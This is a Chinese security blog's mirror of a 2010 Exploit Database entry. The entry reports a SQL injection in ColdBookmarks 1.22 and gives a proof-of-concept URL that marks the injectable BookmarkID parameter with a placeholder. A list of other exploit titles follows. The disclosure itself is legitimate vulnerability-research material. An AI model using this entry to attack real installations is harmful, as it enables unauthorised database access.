体验盒子
  • 博文
  • 设计开发
  • 网络安全
  • 观点
  • 服务
  • AI导航
  • 更多
    • 关于
    • 分享
    • 老电影
    • 搜索语法
    • SecTools
    • UserAgent解析
    • 地理坐标在线转换

ColdBookmarks 1.22 – SQL Injection

  • Exploit Database
  • 113 阅读
  • 作者: mr_me
    日期: 2010-09-07
  • 类别:
    • webapps
    平台:
    • windows
  • 来源:https://www.exploit-db.com/exploits/14933/
  • 1
    2
    3
    4
    5
    6
    7
    # ColdGen - coldbookmarks v1.22 Remote 0day SQL Injection vulnerability
    # Vendor: http://www.coldgen.com/
    # Found by: mr_me (net-ninja.net)
     
    PoC
    http://[target]/[path]/index.cfm?fuseaction=EditBookmark&BookmarkID=[SQLi]&CFID=XXXXXX&CFTOKEN=XXXXXXXX
     
上一篇: DMXReady Members Area Manager – Persistent Cross-Site Scripting
下一篇: FreeBSD 8.1/7.3 – ‘vm.pmap’ Local Race Condition
  • last Exploits
  • ColdBookmarks 1.22 – SQL Injection的更多信息
  • PivotX 2.3.11 – Directory Traversal:
  • FS Lynda Clone – ‘category’ SQL Injection:
  • osCMax 2.5 – ‘/admin/information_manager.php?information_id’ Cross-Site Scripting:
  • WordPress Plugin Total Upkeep 1.14.9 – Database and Files Backup Download:
  • liveSite Version 2019.1 – Remote Code Execution:
  • Anuko Time Tracker 1.19.23.5311 – Password Reset leading to Account Takeover:
  • Apache JackRabbit – WebDAV XML External Entity:
  • Small CRM 2.0 – ’email’ SQL Injection:
体验盒子
  • 关于
  • 博文
  • 分享
  • 存档
  • 服务
体验盒子所发布的一切资源仅限用于学习和研究目的。不得用于非法用途,否则,一切后果用户自负。

2024 体验盒子, 滇ICP备15006848号-1

扫码分享

网络安全
验证:体验盒子
扫码分享
网络安全
打赏零钱
  • 支付宝打赏
  • 微信打赏